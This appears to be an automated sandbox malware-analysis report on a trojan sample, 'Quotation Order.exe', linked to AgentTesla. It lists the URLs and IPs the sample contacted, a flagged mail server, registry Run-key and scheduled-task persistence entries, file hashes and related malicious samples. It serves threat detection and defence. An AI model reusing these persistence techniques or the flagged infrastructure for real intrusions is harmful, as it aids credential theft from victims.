                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0nwsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://account.dyn.com/svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000003.00000003.1363948684.00000215E6C5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://account.live.com/msangcwamsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359102832.000002B805757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000003.00000002.1366086819.00000215E6C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://passport.net/tbsvchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scyc=svchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000003.00000003.1362821532.00000215E6C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dynamic.tsvchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/sconsvchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustncesvchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesAsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-sodsvchost.exe, 00000024.00000003.1425060202.000002B805783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesEncrsvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf7svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scrfsvchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://r3.i.lencr.org/0TAddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2515186191.0000000001154000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000115C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000024.00000002.2517880244.000002B805791000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517472650.000002B80575F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518883672.000002B805C9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425939517.000002B80578D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517123888.000002B805713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://Passport.NET/STSsvchost.exe, 00000024.00000003.1426512052.000002B805E10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000024.00000002.2519461243.000002B805CF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426345130.000002B805C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518233779.000002B805C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519335064.000002B805CD4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1402825732.000002B80570F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://x1.c.lencr.org/0AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://x1.i.lencr.org/0AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1477526079.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1622449138.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2513830671.000000000114B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.microsoft.co4AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP               Domain                              Country        ASN    ASN Name             Malicious
208.95.112.1     ip-api.com                          United States  53334  TUT-ASUS             false
192.254.225.166  mail.bonnyriggdentalsurgery.com.au  United States  46606  UNIFIEDLAYER-AS-1US  true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1432027
Start date and time: 2024-04-26 10:06:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 58
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Quotation Order.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@85/46@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 289
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, Sgrmuserer.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 40.126.28.21, 40.126.28.14, 40.126.28.13, 40.126.28.22, 40.126.28.18, 40.126.28.19, 40.126.7.32, 40.126.28.11, 199.232.210.172, 20.42.73.29, 20.189.173.21
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
10:07:04 | Task Scheduler | Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
10:07:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
10:07:09 | API Interceptor | 91x Sleep call for process: powershell.exe modified
10:07:12 | API Interceptor | 50x Sleep call for process: CasPol.exe modified
10:07:14 | API Interceptor | 44x Sleep call for process: AddInProcess32.exe modified
10:07:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run avdfUcC C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
10:07:19 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
10:07:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
10:07:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run avdfUcC C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | CHEMICAL SPECIFICATIONS.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | TYPE_C_31_M_12 TAMAR 25.4.2024.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | a.cmd | Get hash | malicious | Unknown | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | xtnhsVjQTxvH.exe | Get hash | malicious | Quasar | Browse | ip-api.com/json/
208.95.112.1 | o3KyzpE7F4.ps1 | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe | Get hash | malicious | Exela Stealer, Python Stealer | Browse | ip-api.com/json
208.95.112.1 | Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip | Get hash | malicious | Unknown | Browse | ip-api.com/json
208.95.112.1 | Swift Payment.bat | Get hash | malicious | AgentTesla, GuLoader | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | SARL RABINEAU Order FA2495.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
192.254.225.166 | SARL RABINEAU Order FA2495.exe | Get hash | malicious | AgentTesla | Browse |
192.254.225.166 | proforma invoice.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
192.254.225.166 | New order.exe | Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse |
192.254.225.166 | Request_For_A_Quote.exe | Get hash | malicious | AgentTesla | Browse |
192.254.225.166 | Payment_Overdue.js | Get hash | malicious | Unknown | Browse |
192.254.225.166 | 3ISy5t6Z6d.exe | Get hash | malicious | AgentTesla | Browse |
192.254.225.166 | SecuriteInfo.com.Trojan.DownLoaderNET.447.2279.24952.exe | Get hash | malicious | AgentTesla | Browse |
192.254.225.166 | SecuriteInfo.com.Trojan.DownloaderNET.290.28806.31273.exe | Get hash | malicious | AgentTesla | Browse |
192.254.225.166 | 8TyDCm2Gc2.exe | Get hash | malicious | AgentTesla | Browse |
192.254.225.166 | 6q1lx5JveN.exe | Get hash | malicious | AgentTesla, RedLine | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
mail.bonnyriggdentalsurgery.com.au | SARL RABINEAU Order FA2495.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | proforma invoice.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | New order.exe | Get hash | malicious | AgentTesla, PureLog Stealer, RedLine | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | Request_For_A_Quote.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | Payment_Overdue.js | Get hash | malicious | Unknown | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | 3ISy5t6Z6d.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | SecuriteInfo.com.Trojan.DownLoaderNET.447.2279.24952.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | SecuriteInfo.com.Trojan.DownloaderNET.290.28806.31273.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | 8TyDCm2Gc2.exe | Get hash | malicious | AgentTesla | Browse | 192.254.225.166
mail.bonnyriggdentalsurgery.com.au | 6q1lx5JveN.exe | Get hash | malicious | AgentTesla, RedLine | Browse | 192.254.225.166
ip-api.com | CHEMICAL SPECIFICATIONS.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | TYPE_C_31_M_12 TAMAR 25.4.2024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | a.cmd | Get hash | malicious | Unknown | Browse | 208.95.112.1
ip-api.com | xtnhsVjQTxvH.exe | Get hash | malicious | Quasar | Browse | 208.95.112.1
ip-api.com | o3KyzpE7F4.ps1 | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe | Get hash | malicious | Exela Stealer, Python Stealer | Browse | 208.95.112.1
ip-api.com | Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip | Get hash | malicious | Unknown | Browse | 208.95.112.1
ip-api.com | Swift Payment.bat | Get hash | malicious | AgentTesla, GuLoader | Browse | 208.95.112.1
ip-api.com | SARL RABINEAU Order FA2495.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
bg.microsoft.map.fastly.net | Payment.exe | Get hash | malicious | AgentTesla | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQm | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://4yu76uyd4.best/ccon/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://cnmxukx5efilc7lvlel.pages.dev/smart89/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://www.xf2rnb.cn/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://sabbynarula-73p7yyw32q-ue.a.run.app/Win0belzer0sys07/index.html | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://heiqi.xyz/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://aulixalrrydrea.pages.dev/ | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | http://ipscanadvsf.com | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | Document_a19_79b555791-28h97348k5477-3219g9.js | Get hash | malicious | Latrodectus | Browse | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNIFIEDLAYER-AS-1US | DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe | malicious | AgentTesla, PureLog Stealer | 50.87.253.239
UNIFIEDLAYER-AS-1US | CHEMICAL SPECIFICATIONS.exe | malicious | AgentTesla | 192.254.225.136
UNIFIEDLAYER-AS-1US | SOA FOR APR 2024 PDF.exe | malicious | AgentTesla, PureLog Stealer | 50.87.195.61
UNIFIEDLAYER-AS-1US | INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | malicious | FormBook, PureLog Stealer | 162.240.81.18
UNIFIEDLAYER-AS-1US | DOC-Zcns1G_.html | malicious | HTMLPhisher | 192.232.216.145
UNIFIEDLAYER-AS-1US | DOC-Zcns1G_.html | malicious | HTMLPhisher | 192.232.216.145
UNIFIEDLAYER-AS-1US | DOC-Zcns1G_.html | malicious | HTMLPhisher | 192.232.216.145
UNIFIEDLAYER-AS-1US | https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1 | malicious | Unknown | 192.185.214.24
UNIFIEDLAYER-AS-1US | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | malicious | HTMLPhisher | 162.241.120.242
UNIFIEDLAYER-AS-1US | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | malicious | HTMLPhisher | 162.241.120.242
TUT-AS | CHEMICAL SPECIFICATIONS.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS | TYPE_C_31_M_12 TAMAR 25.4.2024.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS | a.cmd | malicious | Unknown | 208.95.112.1
TUT-AS | xtnhsVjQTxvH.exe | malicious | Quasar | 208.95.112.1
TUT-AS | o3KyzpE7F4.ps1 | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-AS | SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-AS | SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe | malicious | Exela Stealer, Python Stealer | 208.95.112.1
TUT-AS | Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip | malicious | Unknown | 208.95.112.1
TUT-AS | Swift Payment.bat | malicious | AgentTesla, GuLoader | 208.95.112.1
TUT-AS | SARL RABINEAU Order FA2495.exe | malicious | AgentTesla | 208.95.112.1
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | DHL-7654544CNT Pdf.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | SecuriteInfo.com.PWSX-gen.17424.6091.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | Draft Document 940465898900011174774000-PDF.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | DHL DETAILS.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | payment.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | New Order 7003153933.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | Purchase Order.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | CHEMICAL SPECIFICATION.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | Quotation.pdf.exe | malicious | AgentTesla

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2292291332502676
Encrypted: false
SSDEEP: 192:fn+Z6Qw0uvduAaKmNTSOZVWdzuiFvZ24lO8E8E:vG1LuvdlalNeECzuiFvY4lO8HE
MD5: B596EE72B07FD660A3ED773117968118
SHA1: C77954C40251C40455DC2AA57646E8C69CBF397A
SHA-256: 01DE17DD87995221B95D6CCD423ACA9B7F155B1150789D698B0C3FE3619EBB00
SHA-512: 3EBBCC89B2048866A93C6EB179D79DC785E18AE8BB3E46CD748A683C5AC022FD38F3FE704E397BFA1A7F0038F3F00696CD71E487D7E74AD857A26DAE70D8119C
Malicious: false
